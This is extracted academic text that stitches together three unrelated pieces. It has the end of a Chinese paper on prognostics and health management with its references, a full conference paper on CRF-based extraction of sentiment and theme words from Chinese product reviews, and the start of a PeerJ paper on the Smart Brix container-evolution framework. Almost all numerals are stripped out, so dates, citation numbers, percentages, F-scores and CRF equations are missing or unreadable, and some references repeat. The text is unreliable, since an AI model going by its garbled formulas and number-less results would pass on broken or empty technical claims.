often uncertain. up to now, there is no general complex system in china. it is of great significance to our national defense industry and economic development. this paper summarizes the basic concepts, research connotation and basic research status of phm by drawing from foreign advanced experience and deeply studying the key technologies of phm. it mainly summarizes the main methods of phm architecture and fault prognostic. improve the specific technology, used in system development, will be the next major direction of research. acknowledgment this work is partially supported by science & technology program of shaanxi province with project “ gy- ” and “ ktcxsf- - ”, and the opening fund of state and local engineering laboratory of advanced network and monitoring control with project “gsysj ”. references [ ] hess a, fila l. the joint strike fighter (jsf) phm concept: potential impact on aging aircraft problems[c]. proceedings of ieee aerospace conference, big sky, montana, usa, , : - . [ ] keith m j, raymond r b. diagnostics to prognostics - a product availability technology evolution[c]. the rd annual reliability and maintainability symposium(rams ), orlando, fl, usa, : - . [ ] nishad p, diganta d, goebel k, et al. identification of failure precursor parameters for insulated gate bipolar transistors (igbts)[c]. international conference on prognostics and health manageme- nt(phm ), denver, co, usa, : - . [ ] han g t. prognostics and health management of avionics[j]. avionics technology, , ( ): - . [ ] zhang b zh. evolution and application of phm technology[j]. measurement & control technology, , ( ): - . [ ] andrew k s, lin d, banjevic d. a review on machinery diagnostics and prognostics implementing condition- based maintenance[j]. mechanical systems and signal processing, , : - . international conference on sensor network and computer engineering (icsnce ) [ ] xu p, kang r. research on prognostic and health management (phm) technology[j]. measurement and control technology, , ( ): - . [ ] michael g p.prognostics and health management of electronics[m]. john wiley & sons. inc., hoboken, new jersey, : - . [ ] andrew h, leo f. the joint strike fighter (jsf) phm concept: potential impact on aging aircraft problems[c], proceedings of ieee aerospace conference, big sky, montana, usa, , : - . [ ] pan q w, li t, li x sh. research on the architecture of prognostics and health management system[j]. journal of electronic measurement and instrument, (sup-pl.): - . [ ] hess a,calvello g,dabney t.[a].aerospace conference proceedings. ieee[c]. . [ ] araiza m l, kent r, espinosa r.[a]. autotestcon proceedings ieee〔c〕.oct. pages: 一 . [ ] su l p, nolan m, demare g, et al. [a]. autotestcon’ ieee systems readiness technology confer- ence [c]. . [ ] jay lee,fangji wu,wenyu zhao,masoud ghaffari,linxia liao,david siegel. prognostics and health manage-ment design for rotary machinery systems—reviews, methodology and applications[j]. mechanical systems and signal processing, , ( - ). [ ] lu bo, lu yuping, fang xigao. research on neural network dynamic inverse control of hypersonic vehi-cles[j]. computer measurement and control, , ( ): - : [ ] ma ning, lv chen. research on aircraft failure prediction and health management framework[ j]. journal of huazhong university of science and technology (science and technology), , (sup.): - . [ ] chang qi, yuan shenfang. aircraft integrated health management (ivhm) system technology status and development [j]. systems engineering and electronics, , ( ): - . [ ] hu changhua,xu hualong. control system fault diagnosis and fault-tolerant control analysis and design [m]. beijing: national defense industry press, . [ ] hardman w, hess a, blunt d, et al. a usn development strategy and demonstration results for propulsion and mechanical systems diagnostics, prognostics and health management[ a]. proceedings of the ieee ae-rospace conference[ c]. piscat-away: ieee inc., : - . [ ] lv chen. fault diagnosis and prediction technology - principles and applications [m]. [ ] beijing: beijing university of aeronautics and astronautics press, . [ ] liu zhen. research on intelligent bit diagnostic method and its application in multi-electric aircraft pow-er system [d]. xi'an: phd thesis of northwestern polytechnical university, . [ ] xu lijia. electronic system fault prediction and health management technology research [d]. chengdu: unv- ersity of electronic science and technology phd thesis, . [ ] liu xiaohui.study on rfid anti-collision algorithm based on binary number [d]. changchun: jilin university, . [ ] shuen chih tsai,yu-min hu,chen-hsun chai et al.efficient tag reading protocol for large-scale rfid syst- ems with rereading[j]. computer communications, , : - . [ ] g. eason, b. noble, and i. n. sneddon, “on certain integrals of lipschitz-hankel type involving products of bessel functions,” phil. trans. roy. soc. london, vol. a , pp. – , april . (references) [ ] zhang bo. research on anti-collision technology of cfd [d]. shanghai: donghua university, . [ ] g. eason, b. noble, and i. n. sneddon, “on certain integrals of lipschitz-hankel type involving products of bessel functions,” phil. trans. roy. soc. london, vol. a , pp. – , april . (references) [ ] michael g p. prognostics and health management of electronics[m]. john wiley & sons.inc., hoboken, new jersey, , - . [ ] vachtsevanos g, lewis f, roemer m, et al. intelligent fault diagnosis and prognosis for engineering systems[m]. john wiley & sons, inc, : - . [ ] adams d e. nonlinear damage models for diagnosis and prognosis in structural dynamic systems[c]. proceedings of spie conference, : - . [ ] chelidze d. multimode damage tracking and failure prognosis in eletromechanical system[c]. proceedings of spie conference, : - . [ ] ray a, tangirala s. stochastic modeling of fatigue crack dynamics for on-line failure prognostics[j]. ieee transactions on control systems technology, , ( ): - . [ ] li y, kurfess t r, liang s y.stochastic prognostics for rolling element bearings[j]. mechanical systems and signal processing, , : - . [ ] luo j, bixby a, pattipat i ,k,et al. an interacting multiple model approach to model-based prognostics[c]. in proceedings of ieee international conference on system, man and cybernetics, washington, dc, usa, ( ), - . [ ] lesieutre g a, fang l, lee u. hierarchical failure simulation for machinery prognostics[c]. a critical link: diagnosis to prognosis, virginia beach, virginia, usa, , - . [ ] fan j q, yao q w. nonlinear time series: nonpara-metric and parametric methods[m]. usa: springer, , - . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the extraction of comment information and sentiment analysis in chinese reviews li danyang school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com fan huimin school of computer science and engineering xi’an technological university xi’an, china e-mail: @ qq.com zhao yingze school of marxism xi'an jiaotong university xi’an, china e-mail: yingze @ .com abstract—sentiment analysis, also known as opinion mining, refers to the emotional tendencies expressed by the critics through the analysis of the content of the text. the task of text sentiment analysis mainly includes the classification of sentiment, the extraction of sentiment information and the retrieval and induction of sentiment information. based on crf, this paper will extract several pairs of theme words and sentiment words exist in the e-commerce review, and judge the sentiment inclination of the extracted sentiment words. the experimental results show that crf has a good effect on the extraction of emotional information. keywords-crf; extract theme words; extract sentiment words; sentiment analysis i. introduction with the rapid development of web . technology, there have been network reviews on the platform with exponential growth, such as micro-blog reviews, news commentaries and e-commerce reviews, etc. e-commerce is a business activity based on information network technology and centered on commodity exchange. with the diversification of consumer information in twenty-first century, the trading volume of e- commerce has increased rapidly. it has become an important part of the national economy and plays an extremely important role. for the e-commerce platform, the comment information greatly affects the consumer's purchase decision[ ]. by extracting the comment information in the chinese comment text, it can not only guide consumers to make rational consumption, but also help the merchants to improve the quality of the products. the comment information includes the theme words and sentiment words that appear in the commentary, the theme word refers to the evaluation object in the comment, which is the modification object of the sentiment word in the sentence, which is usually expressed as some attribute of the product. the extraction of comment information is one of the key tasks of text sentiment analysis, the existing methods for extracting information from reviews are mainly divided into rules/template and statistical methods. ii. extraction method of evaluation information the rule/template method is mainly based on the characteristics of the text itself, making the corresponding rules or templates to identify the specific field of evaluation objects. liu bing first proposed the problem of evaluation object extraction, he used the noun with high frequency as the evaluation object, and used the nearest adjective from the evaluation object as an sentiment word[ ]. according to the characteristics of chinese language, qiu yunfei and chen yifang put forward the method of extracting commodity evaluation objects by using word characteristics and syntactic analysis[ ]. however, the rule/template method requires domain experts to define the evaluation objects and rules in the corresponding field, so it cannot satisfy the emerging neologisms, and has no cross domain and portability, therefore, the most effective extraction method is based on the statistical method. the statistical extraction method uses a trained statistical model to extract comment information. niklas jako et al. proposed the use of conditional random field model to extract the evaluation object, and model the extraction problem of the evaluation object into a sequence marking task[ ]. jin lijun and others have studied the method of automatic recognition based on svm[ ]. this paper mainly studies the application of crf statistical model in the extraction of comment information. iii. comment information extraction based on crf statistical model a. review information extraction process based on crf based on the statistical method, this paper uses the crf model as the main model and combines the constructed emotional dictionary to extract the comment information, as international conference on sensor network and computer engineering (icsnce ) shown in figure , it mainly includes building emotional lexicon, data preprocessing, part of speech tagging, training crf model, using crf model to extract theme words and sentiment words, judging the sentiment inclination of the extracted sentiment words and exporting final results. figure . review information extraction process based on crf b. data pretreatment data pretreatment is an essential part of text data mining. in this paper, it mainly includes the following parts: ) building a sentiment word dictionary: this paper will extend the sentiment dictionary for the use of the corpus. firstly, the new dictionary is applied to chinese word segmentation, which makes segmentation more accurate and largely avoids the destruction of the theme words and emotional words when they are segmenting. secondly, the new emotional dictionary is applied to the sentiment tendencies of sentiment words. ) chinese word segmentation: chinese word segmentation is the basis of text mining, but chinese is not as natural as english word, so chinese word segmentation is much more complicated than english word segmentation. in this paper, the more mature jieba segmentation algorithm combined with the new sentiment dictionary can be used to carry out chinese word segmentation, which is achieve a good segmentation effect. ) removing the stop words: the stop words are words that are completely useless or meaningless, such as auxiliary words, mood words, punctuation marks and so on. the removal of stop words can improve the efficiency of retrieval, save storage space, and exclude interference words. ) sequence labeling: in order to extract more accurate theme words and sentiment words, this paper divides the elements in the text into categories by using sequence labeling: the theme words is marked as t (theme), the sentiment word is marked as s (sentiment), and the rest of the words are labeled as o (other). the results of some of the data after the above pretreatment are shown in figure . figure . an example of data pretreatment results c. part of speech tagging crf model is actually transforming information extraction problem into sequence labeling problem. therefore, in order to train crf model, we need to process part of speech tagging of corpus in addition to three kinds of customized tags. part of speech is used to describe the function of a word in context. part of speech tagging is also called part-of-speech tagging, which refers to the process of marking a correct part of speech for every word in the word segmentation result. different languages have different set of part of speech tagging. in this paper, the annotation set of parsing tree is used. part of the data after the tagging is shown in table . figure . an example of part of speech tagging d. the introduction of crf conditional random fields[ ], crf or crfs for short, was first proposed by john lafferty in . it combines the characteristics of maximum entropy model and hidden markov model, and it is a probabilistic undirected graph model. it is often used in sequence segmentation and tagging, international conference on sensor network and computer engineering (icsnce ) and the conditional probability of the output node can be calculated under the given input node. crf model can better capture the context information[ ], accurately identify the key information, has been widely applied to many fields of natural language processing, and has a good performance in chinese natural language processing tasks, such as the part of speech tagging, machine translation, prosodic structure prediction and speech recognition. crf is an undirected graph model, and lefferty and others define crf as: order g=(v,e), where g represents an undirected graph, and v and e belong to a set in an undirected graph. in this expression, v represents the set of nodes, and e represents the set of edges. in the tag sequence, the elements and the nodes in the graph correspond to one by one. under the condition of known observation sequence x, if the distribution of the random variable satisfies markov property, that is, the node is adjacent to the node in graph g, then it is called a conditional random field. the formalized description of crf is as follows: set g= (v, e) is an undirected graph, the v represents the set of vertices, and the e represents the set of the edges. y={yv|v∈v} represents the index of vertices in figure g, that is, each vertex corresponds to the composition yv of the marked sequence represented by a random variable. therefore, on the condition of x, the form of joint distribution related to g is p(y ,y ,…,yn|x), in which y is a marker sequence and x represents the observation sequence. if the random variable r satisfies the markov property about g, that is ( | , , ) ( | , , ~ ) v u v u p y x y u v p y x y u v  ( ) in the above formula, u~v indicates that u is adjacent to v in graph g, and (x, y) constitutes a conditional random field. in theory, if graph g represents the conditional dependence between the labeled sequences to be modeled, then its structure can be arbitrary. but when modeling the sequence annotation task, the most simple and general graph structure is: a simple first order chain corresponding to the elements of y is formed. this crf is generally called linear - chain crf, the model of linear - chain crf is shown in figure , x= (x , x ,... xn) is the observation sequence, y= (y , y ,..., yn) is the output sequence. figure . structural representation of linear - chain crf given the observation sequence, the sequence conditional probability of the output is as follows: | exp ( , , , ) ( , , ) ( ) k k i i k k i i k i k p y x t y y x i s y x i z x           ( )= ( ) tk(yi- ,yi,x,i) is a state transfer function; sk(yi,x,i) is a state feature function; tk, sk are all characteristic functions; λk, μk is the weight of the characteristic function, which is learned by training; z(x) is a normalization factor: ( ) ( , , , ) ( , , ) k k i i k k i y i k i k z x t y y x i s y x i             ( ) as one of the most important undirected graph structures, linear - chain crf has been applied to the practical research, and most of the natural language processing research tasks all use linear - chain crf. iv. experimental results and analysis in the experiment, the data set of this paper is divided into two parts: training set and test set based on the data set provided by the big data & computing intelligence contest in . the crf model was trained with the training set, and then the theme words and sentiment words were extracted from the test set, and judge the sentiment inclination of the extracted sentiment words. in this paper, f is used as the index of evaluation model. a. experimental evaluation index there are three main evaluation indexes commonly used in data mining and natural language processing, including accuracy, recall rate and f . among them, the accuracy rate for the prediction results is to indicate how many positive samples are true in the predicted sample. the recall rate is aimed at our original sample, which indicates that the number of examples in the sample is predicted correctly. and f is the harmonic average of the accuracy and recall. in a word, this paper uses the f value as an evaluation standard. in this paper, the calculation formula is as follows: extracting the correct theme words umber of sentiment words extracting theme words / umber of sentiment words p  /n n ( ) extracting the correct theme words umber of sentiment words theme words in data set / total number of sentiment words p  /n ( ) * * ( ) p r f p r   ( ) b. training crf model the crf model is trained after the data set is preprocessed by word segmentation, annotation and so on. this paper uses the open source tool crf++ to train the training model, the feature template needs to be prepared international conference on sensor network and computer engineering (icsnce ) before the training model, and the feature template file of this article is shown in figure . figure . the feature template the t in "t**:%x[#,#]" represents the template type, where there are two templates altogether. the first is unigram template, the first character is u, which is a template for describing unigram feature; the second is bigram template, the first character is b. two "#" respectively represent relative row offsets and column offsets, each line of "%x[#, #]" generates a crf point (state) function: f(s,o), where "s " is the t time label (output), "o" is t times the context. the trained crf model contains feature template and feature dimension, data set number, characteristic function and the weight of information, a series of information is output in the training process, and some of the information is shown in figure . the meaning of the parameter information is as follows: iter: the number of iterations. when the number of iterations reaches the max, the iteration is terminated. terr: mark error rate. serr: sentence error rate. obj: the value of the current object. when the value converges to a definite value, the training is completed. diff: the relative difference between the value of the last object. when this value is lower than eta, the training is completed. figure . output file c. experimental results and analysis after extracting the theme words and sentiment words, the next step is the judgment of the sentiment inclination of the extracted sentiment words, and this step is much simpler. if the sentiment word belongs to the positive affective dictionary, the sentiment is positive. if it belongs to the negative sentiment dictionary, the sentiment is negative, otherwise it is neutral. the experimental results before and after the optimization dictionary are compared as shown in the table below. table is the experimental result of no emotional dictionary. table is the experimental result after optimization. figure . examples of no optimized results figure . examples of optimized results international conference on sensor network and computer engineering (icsnce ) in the above table, there are no definite theme words in some comments, but there are corresponding sentiment words. in this case, the theme word is marked as null. after comparison, it is found that after optimization, the recognition of the theme words is more accurate than before, and the accuracy rate is further improved. the next table is the comparison of the f values before and after the optimization. the comparison results from the table show that the f value of the optimized dictionary is about % higher than that before the optimization. table i. comparison of f before and after optimization data set f , comments . , comments . v. conclusion the accurate recognition of the theme words and sentiment words in the commentary is the key to the extraction of comment information and the basis for further analysis of the text[ ]. the extraction of comment information in chinese review is of great significance to both the merchant and the consumer. the merchant can adjust the goods according to the comment information or improve the quality of the product. the consumer can also make auxiliary decisions according to the comment information. in this paper, the crf statistical model is used to extract the theme words and sentiment words in the comment statement, and it is proved that the crf model is effective in identifying subject words and emotional words. in addition, this paper optimizes the emotional dictionary, which combines data sets and cnki's emotional lexicon to build an new emotional dictionary that is more suitable for this paper. the experimental results show that the optimization dictionary makes the recognition of the theme words and sentiment words more accurate, and the f value is further improved. of course, in addition to the crf model used in this paper, there are other methods that can also extract comment information, such as lda theme model, dependency parsing method and so on. besides, there are still some shortcomings in this paper. chinese expression is much richer than english, in chinese, there are some irony and even the use of network language statements can not accurately identify theme words and sentiment words, so we need further study of chinese semantics and so on. references [ ] li piji, ma jun, zhang dongmei, etc.. “label extraction and sorting in user reviews,” j. journal of chinese information processing, , vol. ( ), pp. - , . [ ] hu mq, liu b. “mining and summarizing customer reviews,” c.proc. of the th acm sigkdd international conference on knowledge discovery and data mining. seattle, wa, usa. , pp. – . [ ] qiu yunfei, chen yifang, wang wei, etc.. “product evaluation object extraction based on word character and syntactic analysis,” j. computer engineering, , vol. ( ), pp. - . [ ] jakob n, gurevych i. “extracting opinion targets in a single-and cross-domain setting with conditional random fields,” proc. of the conference on empirical methods in natural language processing. cambridge, massachusetts. . [ ] jin lijun. “research on the automatic recognition of the usefulness of svm based search commodity reviews,” d. harbin institute of technology, . [ ] john d lafferty, andrew mccallum, fernando c n pereira. “conditional random fields: probabilistic models for segmenting and labeling sequence data,” proceedings of the th international conference on machine learning. williamstown, ma, usa, , pp. - . [ ] wang rongyang, ju jiupeng, li shoushan, etc.. “research on feature extraction feature of evaluation object based on crfs,” j. journal of chinese information processing, , vol. ( ), pp. - . [ ] xia yuan, zhang zheng . “evaluation of object extraction based on crf,” j. computer systemsand applications. , vol. ( ), pp. - . submitted march accepted may published june corresponding author johannes m. schleicher, schleicher@dsg.tuwien.ac.at academic editor elisabetta di nitto additional information and declarations can be found on page doi . /peerj-cs. copyright schleicher et al. distributed under creative commons cc-by . open access smart brix—a continuous evolution framework for container application deployments johannes m. schleicher , michael vögler , christian inzinger and schahram dustdar distributed systems group, tu wien, vienna, austria s.e.a.l—software evolution & architecture lab, university of zürich, zürich, switzerland abstract container-based application deployments have received significant attention in recent years. operating system virtualization based on containers as a mechanism to deploy and manage complex, large-scale software systems has become a popular mechanism for application deployment and operation. packaging application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. however, this flexibility comes at a price. practitioners need to respect numerous constraints ranging from security and compliance requirements, to specific regulatory conditions. fulfilling these requirements is especially challenging in specialized domains with large numbers of stakeholders. moreover, the rapidly growing number of container images to be managed due to the introduction of new or updated applications and respective components, leads to significant challenges for container management and adaptation. in this paper, we introduce smart brix, a framework for continuous evolution of container application deployments that tackles these challenges. smart brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics. furthermore, it allows practitioners to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. we illustrate the feasibility of our approach by evaluating our framework using a case study from the smart city domain. we show that smart brix is horizontally scalable and runtime of the implemented analysis and compensation pipelines scales linearly with the number of container application packages. subjects adaptive and self-organizing systems, distributed and parallel computing, software engineering keywords containers, container evolution, container adaptation, devops, infrastructure as code introduction in recent years, we have seen widespread uptake of operating system virtualization based on containers (soltesz et al., ) as a mechanism to deploy and manage complex, large-scale software systems. using containers, developers create self-contained images of application components along with all dependencies that are then executed in isolation on top of a container runtime (e.g., docker: https://www.docker.com/, rkt: https://github.com/coreos/rkt, or triton: https://www.joyent.com/). by packaging how to cite this article schleicher et al. ( ), smart brix—a continuous evolution framework for container application deployments. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:schleicher@dsg.tuwien.ac.at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://www.docker.com/ https://github.com/coreos/rkt https://www.joyent.com/ http://dx.doi.org/ . /peerj-cs. application components into self-contained artifacts, developers can ensure that the same artifact is consistently used throughout the complete software release process, from initial testing to the final production deployment. this mechanism for application deployment has become especially popular with practitioners executing projects following devops (hüttermann, ) principles. based on the convergence of development and operations, devops advocates a high degree of automation throughout the software development lifecycle (e.g., to implement continuous delivery (humble & farley, )), along with an associated focus on deterministic creation, verification, and deployment of application artifacts using infrastructure as code (iac) (nelson-smith, ) techniques, such as dock- erfiles (https://docs.docker.com/engine/reference/builder/) for containerized applications. these properties allow for straightforward implementation of immutable infrastructure deployments, as advocated by iac approaches. application container images are usually created using a layered structure so that common base functionality can be reused by multiple container images. application-specific artifacts are layered on top of a base file system so that for subsequent updates only the modified layers need to be transferred among different deployment environments. container engine vendors such as docker and coreos provide public repositories where practitioners can share and consume container images, both base images for common linux distributions (e.g., ubuntu, coreos, centos, or alpine) to subsequently add custom functionality, as well as prepared application images that can be directly used in a container deployment. once uploaded to a repository, a container image is assigned a unique, immutable identifier that can subsequently be used to deterministically deploy the exact same application artifact throughout multiple deployment stages. by deploying each application component in its own container (https://docs.docker.com/engine/articles/dockerfile_best-practices/), practitioners can reliably execute multiple component versions on the same machine without introducing conflicts, as each component is executed in an isolated container. however, since each container image must contain every runtime dependency of the packaged application component, each of these dependency sets must be maintained separately. this leads to several challenges for practitioners. over time, the number of active container images grows due to the introduction of new applications, new application components, and updates to existing applications and their components. this growing number of container images inherently leads to a fragmentation of deployed runtime dependencies, making it difficult for operators to ensure that every deployed container continues to adhere to all relevant security, compliance, and regulatory requirements. whenever, for instance, a severe vulnerability is found in a common runtime dependency, practitioners either have to manually determine if any active container images are affected, or initiate a costly rebuild of all active containers, irrespective of the actual occurrence of the vulnerability. we argue that practitioners need a largely automated way to perform arbitrary analyses on all container images in their deployment infrastructure. furthermore, a mechanism is required that allows for the enactment of customizable corrective actions on containers that fail to pass the performed analyses. finally, in order to allow practitioners to deal with the possibly large number of container images, the overall approach should be able to adapt it’s deployment to scale out horizontally. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://docs.docker.com/engine/reference/builder/ https://docs.docker.com/engine/articles/dockerfile_best-practices/ http://dx.doi.org/ . /peerj-cs. in this paper, we present smart brix, a framework for continuous evolution of container applications. smart brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics systems. practitioners are able to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. the framework supports both, traditional mechanisms such as integration tests, as well as custom, business-relevant processes, e.g., to implement security or compliance checks. smart brix not only manages the initial deployment of application containers, but is also designed to continuously monitor the complete application deployment topology to allow for timely reactions to changes (e.g., in regulatory frameworks or discovered application vulnerabilities). to enact such reactions to changes in the application environment, developers define analytics and compensation pipelines that will autonomously mitigate problems if possible, but are designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. to illustrate the feasibility of our approach we evaluate the smart brix framework using a case study from the smart city domain. we show that the runtime of the implemented analysis and compensation pipelines scales linearly with the number of analyzed application packages, and that it adds little overhead compared to container acquisition times. the remainder of this paper is structured as follows. in ‘motivation’ we present a motivating scenario and relevant design goals for our framework. we present the smart brix framework in ‘the smart brix framework,’ along with a detailed discussion of the framework components. in ‘evaluation’ we evaluate our approach using a case study from the smart city domain. related work is discussed in ‘related work’, followed by a conclusion and outlook for further research in ‘conclusion.’ motivation in this paper, we base our discussion on a scenario containing a multi-domain expert network as created within urbem (http://urbem.tuwien.ac.at), a research initiative of the city of vienna and tu wien. to tackle the emerging complexities that arise in the smart city domain, we introduced a novel smart city loop (schleicher et al., b), which is depicted in fig. . this loop outlines a reactive system that enables stakeholders to make informed decisions based on the models and analyses of interdisciplinary domain experts who in turn can access the large amounts of data provided by smart cities. in urbem, a network consists of experts in the domains of energy, mobility, mathematics, building physics, sociology, as well as urban and regional planning. urbem aims to provide decision support for industry stakeholders to plan for the future of the city of vienna and represents a distributed analytical environment (dae) (schleicher et al., c). the experts in this scenario rely on a multitude of different models and analytical approaches to make informed decisions based on the massive amounts of data that are available about the city. in turn, these models rely on a plethora of different tools and environments that lead to complex requirements in terms of providing the right runtime environment for them to operate. the used tools range from modern systems for data analytics and stream processing like cassandra and spark, to proprietary tools schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://urbem.tuwien.ac.at http://dx.doi.org/ . /peerj-cs. figure smart city loop. developed by companies and research institutes with a large variance in specific versions and requirements to run them. additionally, these domains have to deal with a broad range of different stakeholders and their specific security and compliance requirements. models sometimes need to tailor their runtime environment to specific technology stacks to ensure compliance or to be able to access the data they need. managing and satisfying all these requirements is a non-trivial task and a significant factor hindering broader adoption. therefore, this environment offers an optimal case for the advantages that come with the use of container-based approaches. operations teams that need to integrate these models no longer need to be concerned with runtime specifics. experts simply build containers that can be deployed in the heterogenous infrastructures of participating stakeholders. however, several challenges remain. in urbem the team of experts with their plethora of different models created over different images that serve as the foundation for running containers. the models in these containers are fueled by data from several different schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stakeholders in the scenario, ranging from research institutions in the city of vienna to industry stakeholders in the energy and mobility domain. each of them mandates a very distinct set of security and compliance requirements that need to be met in order to run them. these requirements in turn are subject to frequent changes and the containers need to be able to evolve along with them. additionally, even though the container approach provides isolation from the host system it is still vital to ensure that the containers themselves are not compromised. this calls for means to check the systems running inside the container for known vulnerabilities, an issue that is subject to heavy and fast-paced change, again requiring according evolution. a recent study (http://www.banyanops.com/blog/analyzing- docker-hub/) shows that in the case of docker, depending on the version of the images, more than % of the images show potential vulnerabilities, with over % of them being severe. this also begs the question of who is responsible for checking and fixing these vulnerabilities, the operations team or the experts who created them? despite these security and compliance constraints, the ever-changing smart city domain itself makes it necessary for experts to stay on top of the novel toolsets that emerge in order to handle requirements stemming from topics like big data or iot. this leads to a rapid creation and adaptation of models and their according containers, which in turn need be checked against these constraints again. last but not least, these containers need to comply to certain non-functional requirements that arise from the specific situations they are applied in. this calls for the ability to constantly check containers against certain runtime metrics that need to be met in order to ensure that these systems are able to deliver their excepted results within stakeholder-specific time and resource constraints. all these factors lead to a complex environment that calls for an ability to easily adapt and evolve containers to their ever-changing requirements. specifically, we identify the following requirements in the context of our domain: • the ability to check a large amount of heterogenous containers against an open set of evolving requirements. these requirements can be vulnerabilities, compliance constraints, functional tests, or any other metric of interest for the domain. • the ability to mitigate issues and evolve these containers based on the results from the previously mentioned checks. • an approach that is applicable in the context of operations management, while still enabling the participation of experts both for checking as well as evolution. • an approach that can be applied to existing deployments as well as utilized to test new ones. the smart brix framework in this section, we introduce the smart brix framework for continuos evolution of container-based deployments, which addresses the previously introduced requirements. we start with a framework overview, followed by a detailed description of all framework elements, and conclude with a comprehensive description of our proof of concept implementation including possible deployment variants. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.banyanops.com/blog/analyzing-docker-hub/ http://www.banyanops.com/blog/analyzing-docker-hub/ http://dx.doi.org/ . /peerj-cs. figure smart brix framework overview. framework rationales the smart brix framework follows the microservice (newman, ) architecture paradigm and an overview of the main framework components is shown in fig. . the framework is logically organized into four main facets, which group areas of responsibility. each of these facets is composed of multiple components where each of these components represents a microservice. the components in the analyzer and compensation facet are managed as self- assembling omponents (http://techblog.netflix.com/ / /building-netflix-playback- with-self.html), an approach we already successfully applied in previous work (schleicher et al., a). each of these components follows the command pattern (gamma et al., ) and consists of multiple processors that are able to accept multiple inputs and produce exactly one output. this functional approach enables a clean separation of concerns and allows us to decompose complex problems into manageable units. figure illustrates an example of auto-assembly within the analyzer facet. we see a set of processors, where each processor is waiting for a specific type of input and clearly specifies the output it produces. the processors use a message-oriented approach to exchange input and output data, where each output and input is persistently available in the message queue and accessible by any processor. in this example we perform an analysis of a custom-built debian-based container that hosts the apache httpd server. there are two potential processors for the input artifact, each of them able to handle a different container format. since in our example the artifact is a docker container, only the docker analyzer reacts and produces as output a docker image. in the next step there are two active processors, the docker base image analyzer and the docker package system analyzer, both taking docker images as input. since the docker base image analyzer cannot determine a base image for the given docker image, it produces no output. however, the docker package system analyzer is able to determine that the image uses a dpkg-based package system and produces the according output. now the dpkg package analyzer reacts by taking two inputs, the original artifact as well as the dpkg output and inspects the artifact via the schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://techblog.netflix.com/ / /building-netflix-playback-with-self.html http://techblog.netflix.com/ / /building-netflix-playback-with-self.html http://dx.doi.org/ . /peerj-cs. figure example of auto assembling processors within the analyzer facet. dpkg command to produce a package list. in the last step of this auto-assembly example the vulnerability analyzer listens for a package list and produces a list of vulnerabilities. this enables a straightforward auto-assembly approach, where connecting previous outputs to desired inputs leads to an automatically assembled complex system consisting of simple manageable processors. a processor itself can be anything and is not bound to any specific functionality, so it can be created completely flexibel depending on the task at hand. this approach further eliminates the necessity of complex composition and organization mechanisms, enabling dynamic and elastic compositions of desired functionality, where processors can be added on demand at runtime. this enables the previously mentioned creation of open and flexible analytics and compensation pipelines based on this principle. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure confidence adaptation model escalation. additionally, the components in the analyzer and compensation facets follow the principle of confidence elasticity, which means that a component or processor produces a result that is augmented with a confidence value (c ∈r, ≤c ≤ ), with representing no certainty and representing absolute certainty about the produced result. this allows for the specification of acceptable confidence intervals for the framework, which augment the auto-assembly mechanism. the confidence intervals are provided as optional configuration elements for the framework. in case the provided confidence thresholds are not met, the framework follows an escalation model to find the next component or processor that is able to provide results with higher confidence until it reaches the point where human interaction is necessary to produce a satisfactory result (illustrated in fig. ). each processor (pi) from the set of active processors (pa) provides a confidence value ci. we define the overall confidence value of all active processors (ca) as ca= ∏ pi∈pa ci. the compensation stops when ca meets the specified confidence interval of the framework or a processor represents a human interaction which has a confidence value of (ci= ). smart brix manager in order to initiate a container evolution, the smart brix manager is invoked via the smart brix api with the following parameters: (i) a set of containers to be inspected with (ii) the necessary credentials to analyze and evolve them, as well as an optional (iii) set of artifacts necessary to compensate or analyze the containers. in a first step the smart schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. brix manager queries the repository manager to see if there are already known issues for the supplied containers. if any known issues are found, the smart brix manager creates a corresponding compensation topic via the messaging infrastructure by publishing the container identifiers as well as the found issues. this represents an input that will subsequently be consumed by the corresponding compensation handlers and starts the previously described auto-assembly process in the compensation facet. if no issues were found, the smart brix manager hands off the supplied containers, credentials and artifacts to the dependency manager that is responsible for storing them in the dependency repository. as a next step, the smart brix manager creates a corresponding analyzer topic via the messaging infrastructure and publishes the container identifiers to it. this generates an input that will be consumed by the corresponding analyzers and starts another auto-assembly process in the analyzer facet. the smart brix manager then listens to the created topic and waits for a response from the analyzer facet. if any analyzer responds, the manager checks the confidence value of the provided results against the configured confidence interval of the framework. if the results satisfy the interval it uses the repository api to store them in the analytics repository. if the confidence intervals are not satisfied, it waits for a configured timeout for additional results to emerge. if this fails the framework escalates according to the principle of confidence elasticity and marks the containers as required for human interaction. if the confidence interval was met, the smart brix manager initiates the previously mentioned auto-assembly process in the compensation facet. the smart brix manager then listens to the created topic and waits for a response from any compensation handler. in case of a response, it checks the confidence values by applying the same approach as for the analyzer facet, and stores them as compensations into the analytics repository. a corresponding sequence diagram illustrating this is shown in fig. . furthermore, the smart brix manager provides api endpoints to query the results of analytics and compensation processes, as well as the current status via container identifiers. repository manager the repository manager provides a repository for storing analytics results of all analyzed containers as well as their corresponding compensations. the analytics repository itself is a distributed key value store that enables analyzers as well as compensation handlers to store information without being bound to a fixed schema. in addition, this enables the previously mentioned open extensibility of our auto-assembly approach by allowing every component to choose the required storage format. finally, the repository manager provides a service interface to store and retrieve analytics and compensation information as well as an interface for querying information based on container identifiers or other 